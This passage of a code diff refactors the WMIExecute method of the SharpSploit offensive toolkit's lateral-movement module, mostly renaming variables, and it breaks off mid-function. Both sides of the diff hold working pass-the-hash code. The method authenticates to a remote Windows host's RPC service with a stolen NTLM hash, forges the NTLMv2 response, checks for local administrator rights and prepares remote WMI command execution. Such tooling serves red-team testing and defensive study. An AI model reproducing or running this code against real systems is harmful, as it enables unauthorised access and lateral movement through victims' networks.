-        public static string WMIExecute(string username, string hash, string domain, string target, string command = "", int sleep = 15, bool AdminCheck = false, bool debug = false)
+        public static string WMIExecute(string username, string hash, string domain, string Target, string command = "", int sleep = 15, bool AdminCheck = false, bool debug = false)
         {
-            //Change this name
-            string target_short = String.Empty;
+            string Target_Short = String.Empty;
             string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-00-00", "").Replace("-", "");
-            string auth_hostname = Environment.MachineName;
-            string output_username = String.Empty;
-            string WMI_random_port_string = null;
-            string target_long = String.Empty;
+            string Auth_Hostname = Environment.MachineName;
+            string Output_Username = String.Empty;
+            string WMI_Random_Port_String = null;
+            string Target_Long = String.Empty;
             string WMI_client_stage = String.Empty;
-            string WMI_data = String.Empty;
+            string WMI_Data = String.Empty;
             string OXID = String.Empty;
             StringBuilder output = new StringBuilder();
-            //Change this name
-            int request_split_stage = 0;
-            int request_length = 0;
-            int sequence_number_counter = 0;
-            int request_split_index_tracker = 0;
-            int request_auth_padding = 0;
-            int OXID_index = 0;
-            int OXID_bytes_index = 0;
-            int WMI_random_port_int = 0;
-            int target_process_id = 0;
+            int Request_Split_Stage = 0;
+            int Request_Length = 0;
+            int Sequence_Number_Counter = 0;
+            int Request_Split_Index_Tracker = 0;
+            int Request_Auth_Padding = 0;
+            int OXID_Index = 0;
+            int OXID_Bytes_Index = 0;
+            int WMI_Random_Port_Int = 0;
+            int Target_Process_ID = 0;
             bool success = false;
-            IPAddress target_type = null;
-            byte[] object_UUID = null;
+            IPAddress Target_Type = null;
+            byte[] Assoc_Group = null;
+            byte[] Object_UUID = null;
             byte[] IPID = null;
-            byte[] WMI_client_send;
-            byte[] object_UUID2 = null;
-            byte[] sequence_number = null;
-            byte[] request_flags = null;
-            byte[] process_ID_Bytes = Utilities.ConvertStringToByteArray(processID);
-            byte[] request_call_ID = null;
-            byte[] request_opnum = null;
-            byte[] request_UUID = null;
-            byte[] request_context_ID = null;
-            byte[] alter_context_call_ID = null;
-            byte[] alter_context_context_ID = null;
-            byte[] alter_context_UUID = null;
-            byte[] hostname_length = null;
-            byte[] stub_data = null;
-            byte[] WMI_namespace_length = null;
-            byte[] WMI_namespace_unicode = null;
+            byte[] WMI_Client_Send;
+            byte[] Object_UUID2 = null;
+            byte[] Sequence_Number = null;
+            byte[] Request_Flags = null;
+            byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID);
+            byte[] Request_Call_ID = null;
+            byte[] Request_Opnum = null;
+            byte[] Request_UUID = null;
+            byte[] Request_Context_ID = null;
+            byte[] Alter_Context_Call_ID = null;
+            byte[] Alter_Context_Context_ID = null;
+            byte[] Alter_Context_UUID = null;
+            byte[] Hostname_Length = null;
+            byte[] Stub_Data = null;
+            byte[] WMI_Namespace_Length = null;
+            byte[] WMI_Namespace_Unicode = null;
             byte[] IPID2 = null;
 
             if (!string.IsNullOrEmpty(hash) && !string.IsNullOrEmpty(username))
@@ -139,271 +138,264 @@ namespace SharpSploit.LateralMovement
 
 
             if (!string.IsNullOrEmpty(domain))
-                output_username = domain + '\\' + username;
+                Output_Username = domain + '\\' + username;
             else
-                output_username = username;
+                Output_Username = username;
 
-            if (target == "localhost")
+            if (Target == "localhost")
             {
-                target = "127.0.0.1";
-                target_long = "127.0.0.1";
+                Target = "127.0.0.1";
+                Target_Long = "127.0.0.1";
             }
 
             try
             {
-                if (debug) { output.AppendLine(String.Format("Connecting to: {0}", target)); }
-                target_type = IPAddress.Parse(target);
-                target_short = target_long = target;
+                if (debug) { output.AppendLine(String.Format("Connecting to: {0}", Target)); }
+                Target_Type = IPAddress.Parse(Target);
+                Target_Short = Target_Long = Target;
             }
             catch
             {
-                target_long = target;
+                Target_Long = Target;
 
-                if (target.Contains("."))
+                if (Target.Contains("."))
                 {
-                    int target_short_index = target.IndexOf(".");
-                    target_short = target.Substring(0, target_short_index);
+                    int Target_Short_index = Target.IndexOf(".");
+                    Target_Short = Target.Substring(0, Target_Short_index);
                 }
                 else
                 {
-                    target_short = target;
+                    Target_Short = Target;
                 }
             }
 
-            var WMI_client = new TcpClient();
+            var WMI_Client = new TcpClient();
 
             try
             {
-                WMI_client.Connect(target, 135);
+                WMI_Client.Connect(Target, 135);
             }
             catch
             {
-                return "No Response from: " + target;
+                return "No Response from: " + Target;
             }
 
-            if (WMI_client.Connected)
+            if (WMI_Client.Connected)
             {
-                if (debug) { output.AppendLine(String.Format("Connected to: {0}", target)); }
-                //Get Stream for WMI Client Connection
-                NetworkStream WMI_client_stream = WMI_client.GetStream();
-                byte[] WMI_client_receive = new byte[2048];
+                if (debug) { output.AppendLine(String.Format("Connected to: {0}", Target)); }
+                NetworkStream WMI_Client_Stream = WMI_Client.GetStream();
+                byte[] WMI_Client_Receive = new byte[2048];
                 byte[] RPC_UUID = new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a };
-                OrderedDictionary packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x02 }, new byte[] { 0x00, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
-                packet_RPC["RPCBind_FragLength"] = new byte[] { 0x74, 0x00 };
-                WMI_client_receive = SendStream(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
-                byte[] assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
-                packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x05, 0x00 }, null);
-                WMI_client_receive = SendStream(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
-                string WMI_hostname = BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 42, WMI_client_receive.Length));
-                byte[] WMI_hostname_bytes = Utilities.ConvertStringToByteArray(WMI_hostname.Substring(0, WMI_hostname.IndexOf("-00-00-00")).Replace("-00", "").Replace("-", "").Replace(" ", ""));
-                WMI_hostname_bytes = Utilities.GetByteRange(WMI_hostname_bytes, 0, WMI_hostname_bytes.Length);
-                WMI_hostname = Encoding.ASCII.GetString(WMI_hostname_bytes);
-                if (target_short != WMI_hostname)
+                OrderedDictionary Packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x02 }, new byte[] { 0x00, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
+                Packet_RPC["RPCBind_FragLength"] = new byte[] { 0x74, 0x00 };
+                WMI_Client_Receive = SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC));
+                Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x05, 0x00 }, null);
+                WMI_Client_Receive = SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC));
+                string WMI_HostName = BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 42, WMI_Client_Receive.Length));
+                byte[] WMI_Hostname_Bytes = Utilities.ConvertStringToByteArray(WMI_HostName.Substring(0, WMI_HostName.IndexOf("-00-00-00")).Replace("-00", "").Replace("-", "").Replace(" ", ""));
+                WMI_Hostname_Bytes = Utilities.GetByteRange(WMI_Hostname_Bytes, 0, WMI_Hostname_Bytes.Length);
+                WMI_HostName = Encoding.ASCII.GetString(WMI_Hostname_Bytes);
+                if (Target_Short != WMI_HostName)
                 {
-                    if (debug) { output.AppendLine(String.Format("Switching target name to {0} due to initial response.", WMI_hostname)); }
-                    target_short = WMI_hostname;
+                    if (debug) { output.AppendLine(String.Format("Switching Target name to {0} due to initial response.", WMI_HostName)); }
+                    Target_Short = WMI_HostName;
                 }
-                WMI_client.Close();
-                WMI_client_stream.Close();
-                WMI_client = new TcpClient();
-                WMI_client.ReceiveTimeout = 30000;
+                WMI_Client.Close();
+                WMI_Client_Stream.Close();
+                WMI_Client = new TcpClient();
+                WMI_Client.ReceiveTimeout = 30000;
 
                 try
                 {
-                    WMI_client.Connect(target_long, 135);
+                    WMI_Client.Connect(Target_Long, 135);
                 }
                 catch
                 {
-                    output.AppendLine(String.Format("No response from {0}", target));
+                    output.AppendLine(String.Format("No response from {0}", Target));
                     return output.ToString();
                 }
 
-                if (WMI_client.Connected)
+                if (WMI_Client.Connected)
                 {
-                    if (debug) { output.AppendLine(String.Format("ReConnected to: {0} ", target)); }
+                    if (debug) { output.AppendLine(String.Format("ReConnected to: {0} ", Target)); }
                     if (debug) { output.AppendLine("Authenticating"); }
-                    WMI_client_stream = WMI_client.GetStream();
+                    WMI_Client_Stream = WMI_Client.GetStream();
                     RPC_UUID = new byte[] { 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 };
-                    packet_RPC = WMIExec.RPCBind(3, new byte[] { 0xd0, 0x16 }, new byte[] { 0x01 }, new byte[] { 0x01, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
-                    packet_RPC["RPCBind_FragLength"] = new byte[] { 0x78, 0x00 };
-                    packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
-                    packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x07, 0x82, 0x08, 0xa2 };
-                    WMI_client_receive = SendStream(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
-                    assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
-                    string WMI_NTLMSSP = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                    Packet_RPC = WMIExec.RPCBind(3, new byte[] { 0xd0, 0x16 }, new byte[] { 0x01 }, new byte[] { 0x01, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
+                    Packet_RPC["RPCBind_FragLength"] = new byte[] { 0x78, 0x00 };
+                    Packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
+                    Packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x07, 0x82, 0x08, 0xa2 };
+                    WMI_Client_Receive = SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC));
+                    string WMI_NTLMSSP = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
                     int WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000");
                     int WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2;
-                    int WMI_domain_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_client_receive);
-                    int WMI_target_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_client_receive);
-                    byte[] WMI_session_ID = Utilities.GetByteRange(WMI_client_receive, 44, 51);
-                    byte[] WMI_NTLM_challenge = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
-                    byte[] WMI_target_details = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 56 + WMI_domain_length, WMI_NTLMSSP_bytes_index + 55 + WMI_domain_length + WMI_target_length);
-                    byte[] WMI_target_time_bytes = Utilities.GetByteRange(WMI_target_details, WMI_target_details.Length - 12, WMI_target_details.Length - 5);
+                    int WMI_Domain_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_Client_Receive);
+                    int WMI_target_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_Client_Receive);
+                    byte[] WMI_NTLM_Challenge = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
+                    byte[] WMI_Target_Details = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 56 + WMI_Domain_Length, WMI_NTLMSSP_bytes_index + 55 + WMI_Domain_Length + WMI_target_Length);
+                    byte[] WMI_Target_Time_Bytes = Utilities.GetByteRange(WMI_Target_Details, WMI_Target_Details.Length - 12, WMI_Target_Details.Length - 5);
                     StringBuilder sb = new StringBuilder();
                     for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); };
                     byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
-                    string[] hash_string_array = sb.ToString().Split('-');
-                    byte[] auth_hostname_bytes = Encoding.Unicode.GetBytes(auth_hostname);
-                    byte[] auth_domain_bytes = Encoding.Unicode.GetBytes(domain);
-                    byte[] auth_username_bytes = Encoding.Unicode.GetBytes(username);
-                    byte[] auth_domain_length = BitConverter.GetBytes(auth_domain_bytes.Length);
-                    auth_domain_length = new byte[] { auth_domain_length[0], auth_domain_length[1] };
-                    byte[] auth_username_length = BitConverter.GetBytes(auth_username_bytes.Length);
-                    auth_username_length = new byte[] { auth_username_length[0], auth_username_length[1] };
-                    byte[] auth_hostname_length = BitConverter.GetBytes(auth_hostname_bytes.Length);
-                    auth_hostname_length = new byte[] { auth_hostname_length[0], auth_hostname_length[1] };
-                    byte[] auth_domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
-                    byte[] auth_username_offset = BitConverter.GetBytes(auth_domain_bytes.Length + 64);
-                    byte[] auth_hostname_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + 64);
-                    byte[] auth_LM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 64);
-                    byte[] auth_NTLM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 88);
+                    byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
+                    byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
+                    byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
+                    byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
+                    Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
+                    byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
+                    Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
+                    byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
+                    Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
+                    byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
+                    byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
+                    byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
+                    byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
+                    byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
                     HMACMD5 HMAC_MD5 = new HMACMD5();
                     HMAC_MD5.Key = NTLM_hash_bytes;
-                    string username_and_target = username.ToUpper();
-                    byte[] username_bytes = Encoding.Unicode.GetBytes(username_and_target);
-                    byte[] username_and_target_bytes = null;
-                    username_and_target_bytes = username_bytes.Concat(auth_domain_bytes).ToArray<byte>();
-                    byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
+                    string Username_And_Target = username.ToUpper();
+                    byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
+                    byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray<byte>();
+                    byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
                     Random r = new Random();
-                    byte[] client_challenge_bytes = new byte[8];
-                    r.NextBytes(client_challenge_bytes);
-                    byte[] security_blob_bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                        .Concat(WMI_target_time_bytes)
-                        .Concat(client_challenge_bytes)
+                    byte[] Client_Challenge_Bytes = new byte[8];
+                    r.NextBytes(Client_Challenge_Bytes);
+                    byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(WMI_Target_Time_Bytes)
+                        .Concat(Client_Challenge_Bytes)
                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
-                        .Concat(WMI_target_details)
+                        .Concat(WMI_Target_Details)
                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                     
-                    byte[] server_challenge_and_security_blob_bytes = WMI_NTLM_challenge.Concat(security_blob_bytes).ToArray();
+                    byte[] Server_Challenge_And_Security_Blob_Bytes = WMI_NTLM_Challenge.Concat(Security_Blob_Bytes).ToArray();
                     HMAC_MD5.Key = NTLMv2_hash;
-                    byte[] NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
-                    byte[] session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
-                    NTLMv2_response = NTLMv2_response.Concat(security_blob_bytes).ToArray();
-                    byte[] NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
-                    NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
-                    byte[] WMI_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
-                    byte[] WMI_session_key_length = new byte[] { 0x00, 0x00 };
-                    byte[] WMI_negotiate_flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
+                    byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
+                    byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
+                    NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
+                    byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
+                    NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
+                    byte[] WMI_Session_Key_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
+                    byte[] WMI_Session_Key_Length = new byte[] { 0x00, 0x00 };
+                    byte[] WMI_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
                     
                     byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
-                        .Concat(auth_LM_offset)
-                        .Concat(NTLMv2_response_length)
-                        .Concat(NTLMv2_response_length)
-                        .Concat(auth_NTLM_offset)
-                        .Concat(auth_domain_length)
-                        .Concat(auth_domain_length)
-                        .Concat(auth_domain_offset)
-                        .Concat(auth_username_length)
-                        .Concat(auth_username_length)
-                        .Concat(auth_username_offset)
-                        .Concat(auth_hostname_length)
-                        .Concat(auth_hostname_length)
-                        .Concat(auth_hostname_offset)
-                        .Concat(WMI_session_key_length)
-                        .Concat(WMI_session_key_length)
-                        .Concat(WMI_session_key_offset)
-                        .Concat(WMI_negotiate_flags)
-                        .Concat(auth_domain_bytes)
-                        .Concat(auth_username_bytes)
-                        .Concat(auth_hostname_bytes)
+                        .Concat(Auth_LM_Offset)
+                        .Concat(NTLMv2_Response_Length)
+                        .Concat(NTLMv2_Response_Length)
+                        .Concat(Auth_NTLM_Offset)
+                        .Concat(Auth_Domain_Length)
+                        .Concat(Auth_Domain_Length)
+                        .Concat(Auth_Domain_offset)
+                        .Concat(Auth_Username_Length)
+                        .Concat(Auth_Username_Length)
+                        .Concat(Auth_Username_Offset)
+                        .Concat(Auth_Hostname_Length)
+                        .Concat(Auth_Hostname_Length)
+                        .Concat(Auth_Hostname_Offset)
+                        .Concat(WMI_Session_Key_Length)
+                        .Concat(WMI_Session_Key_Length)
+                        .Concat(WMI_Session_Key_Offset)
+                        .Concat(WMI_Negotiate_Flags)
+                        .Concat(Auth_Domain_Bytes)
+                        .Concat(Auth_Username_Bytes)
+                        .Concat(Auth_Hostname_Bytes)
                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                        .Concat(NTLMv2_response).ToArray();
+                        .Concat(NTLMv2_Response).ToArray();
 
-                    assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
-                    packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
-                    WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
-                    WMI_client_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
-                    WMI_client_stream.Flush();
-                    byte[] causality_ID_bytes = new byte[16];
-                    r.NextBytes(causality_ID_bytes);
-                    OrderedDictionary packet_DCOM_remote_create_instance = WMIExec.DCOMRemoteCreateInstance(causality_ID_bytes, target_short);
-                    byte[] DCOM_remote_create_instance = Utilities.ConvertFromPacketOrderedDictionary(packet_DCOM_remote_create_instance);
-                    packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, DCOM_remote_create_instance.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x01, 0x00 }, new byte[] { 0x04, 0x00 }, null);
-                    WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC).Concat(DCOM_remote_create_instance).ToArray();
-                    WMI_client_receive = SendStream(WMI_client_stream, WMI_client_send);
-                    TcpClient WMI_client_random_port = new TcpClient();
-                    WMI_client_random_port.Client.ReceiveTimeout = 30000;
+                    Packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
+                    WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
+                    WMI_Client_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length);
+                    WMI_Client_Stream.Flush();
+                    byte[] Causality_ID_Bytes = new byte[16];
+                    r.NextBytes(Causality_ID_Bytes);
+                    OrderedDictionary Packet_DCOM_Remote_Create_Instance = WMIExec.DCOMRemoteCreateInstance(Causality_ID_Bytes, Target_Short);
+                    byte[] DCOM_Remote_Create_Instance = Utilities.ConvertFromPacketOrderedDictionary(Packet_DCOM_Remote_Create_Instance);
+                    Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, DCOM_Remote_Create_Instance.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x01, 0x00 }, new byte[] { 0x04, 0x00 }, null);
+                    WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC).Concat(DCOM_Remote_Create_Instance).ToArray();
+                    WMI_Client_Receive = SendStream(WMI_Client_Stream, WMI_Client_Send);
+                    TcpClient WMI_Client_Random_Port = new TcpClient();
+                    WMI_Client_Random_Port.Client.ReceiveTimeout = 30000;
 
-                    if (WMI_client_receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 24, 27)) == "05-00-00-00")
+                    if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) == "05-00-00-00")
                     {
                         output.AppendLine("WMI Access Denied");
                         return output.ToString();
                     }
-                    else if (WMI_client_receive[2] == 3)
+                    else if (WMI_Client_Receive[2] == 3)
                     {
-                        string error_code = BitConverter.ToString(new byte[] { WMI_client_receive[27], WMI_client_receive[26], WMI_client_receive[25], WMI_client_receive[24] });
-                        string[] error_code_array = error_code.Split('-');
-                        error_code = string.Join("", error_code_array);
-                        output.AppendLine(String.Format("Error Code: 0x{0}", error_code.ToString()));
+                        string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
+                        string[] Error_Code_Array = Error_Code.Split('-');
+                        Error_Code = string.Join("", Error_Code_Array);
+                        output.AppendLine(String.Format("Error Code: 0x{0}", Error_Code.ToString()));
                         return output.ToString();
                     }
-                    else if (WMI_client_receive[2] == 2 && AdminCheck)
+                    else if (WMI_Client_Receive[2] == 2 && AdminCheck)
                     {
-                        output.AppendLine(String.Format("{0} is a local administrator on {1}", output_username, target_long));
+                        output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target_Long));
                         if (debug) { output.AppendLine("Exiting due to AdminCheck being set"); }
                         return output.ToString();
                     }
-                    else if (WMI_client_receive[2] == 2 && !AdminCheck)
+                    else if (WMI_Client_Receive[2] == 2 && !AdminCheck)
                     {
                         if (debug) { output.AppendLine("Continuing since AdminCheck is false"); }
-                        if (target_short == "127.0.0.1")
+                        if (Target_Short == "127.0.0.1")
                         {
-                            target_short = auth_hostname;
+                            Target_Short = Auth_Hostname;
                         }
-                        byte[] target_unicode = (new byte[] { 0x07, 0x00 }).Concat(Encoding.Unicode.GetBytes(target_short + "[")).ToArray();
-                        string target_search = BitConverter.ToString(target_unicode).Replace("-", "");
-                        string WMI_message = BitConverter.ToString(WMI_client_receive).Replace("-", "");
-                        int target_index = WMI_message.IndexOf(target_search);
+                        byte[] Target_Unicode = (new byte[] { 0x07, 0x00 }).Concat(Encoding.Unicode.GetBytes(Target_Short + "[")).ToArray();
+                        string Target_Search = BitConverter.ToString(Target_Unicode).Replace("-", "");
+                        string WMI_message = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
+                        int Target_Index = WMI_message.IndexOf(Target_Search);
 
-                        if (target_index < 1)
+                        if (Target_Index < 1)
                         {
-                            IPAddress[] target_address_list = Dns.GetHostEntry(target_long).AddressList;
-                            foreach (IPAddress ip in target_address_list)
+                            IPAddress[] Target_Address_List = Dns.GetHostEntry(Target_Long).AddressList;
+                            foreach (IPAddress ip in Target_Address_List)
                             {
-                                target_short = ip.Address.ToString();
-                                target_search = BitConverter.ToString(target_unicode).Replace("-", "");
-                                target_index = WMI_message.IndexOf(target_search);
+                                Target_Short = ip.Address.ToString();
+                                Target_Search = BitConverter.ToString(Target_Unicode).Replace("-", "");
+                                Target_Index = WMI_message.IndexOf(Target_Search);
 
-                                if (target_index >= 0)
+                                if (Target_Index >= 0)
                                 {
                                     break;
                                 }
                             }
                         }
 
-                        if (target_index > 0)
+                        if (Target_Index > 0)
                         {
-                            int target_bytes_index = target_index / 2;
-                            byte[] WMI_random_port_bytes = Utilities.GetByteRange(WMI_client_receive, target_bytes_index + target_unicode.Length, target_bytes_index + target_unicode.Length + 8);
-                            WMI_random_port_string = BitConverter.ToString(WMI_random_port_bytes);
-                            int WMI_random_port_end_index = WMI_random_port_string.IndexOf("-5D");
-                            if (WMI_random_port_end_index > 0)
+                            int Target_Bytes_Index = Target_Index / 2;
+                            byte[] WMI_Random_Port_Bytes = Utilities.GetByteRange(WMI_Client_Receive, Target_Bytes_Index + Target_Unicode.Length, Target_Bytes_Index + Target_Unicode.Length + 8);
+                            WMI_Random_Port_String = BitConverter.ToString(WMI_Random_Port_Bytes);
+                            int WMI_Random_Port_End_Index = WMI_Random_Port_String.IndexOf("-5D");
+                            if (WMI_Random_Port_End_Index > 0)
                             {
-                                WMI_random_port_string = WMI_random_port_string.Substring(0, WMI_random_port_end_index);
+                                WMI_Random_Port_String = WMI_Random_Port_String.Substring(0, WMI_Random_Port_End_Index);
                             }
-                            WMI_random_port_string = WMI_random_port_string.Replace("-00", "").Replace("-", "");
-                            char[] random_port_char_array = WMI_random_port_string.ToCharArray();
-                            char[] chars = new char[] { random_port_char_array[1], random_port_char_array[3], random_port_char_array[5], random_port_char_array[7], random_port_char_array[9] };
-                            WMI_random_port_int = int.Parse(new string(chars));
-                            string reverse = BitConverter.ToString(WMI_client_receive).Replace("-", "");
-                            int reverse_index = reverse.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820");
-                            int reverse_bytes_index = reverse_index / 2;
-                            byte[] OXID_bytes = Utilities.GetByteRange(WMI_client_receive, reverse_bytes_index + 32, reverse_bytes_index + 39);
-                            IPID = Utilities.GetByteRange(WMI_client_receive, reverse_bytes_index + 48, reverse_bytes_index + 63);
+                            WMI_Random_Port_String = WMI_Random_Port_String.Replace("-00", "").Replace("-", "");
+                            char[] Random_Port_Char_Array = WMI_Random_Port_String.ToCharArray();
+                            char[] chars = new char[] { Random_Port_Char_Array[1], Random_Port_Char_Array[3], Random_Port_Char_Array[5], Random_Port_Char_Array[7], Random_Port_Char_Array[9] };
+                            WMI_Random_Port_Int = int.Parse(new string(chars));
+                            string Reverse = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
+                            int Reverse_Index = Reverse.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820");
+                            int Reverse_Bytes_Index = Reverse_Index / 2;
+                            byte[] OXID_bytes = Utilities.GetByteRange(WMI_Client_Receive, Reverse_Bytes_Index + 32, Reverse_Bytes_Index + 39);
+                            IPID = Utilities.GetByteRange(WMI_Client_Receive, Reverse_Bytes_Index + 48, Reverse_Bytes_Index + 63);
                             OXID = BitConverter.ToString(OXID_bytes).Replace("-", "");
-                            OXID_index = reverse.IndexOf(OXID, reverse_index + 100);
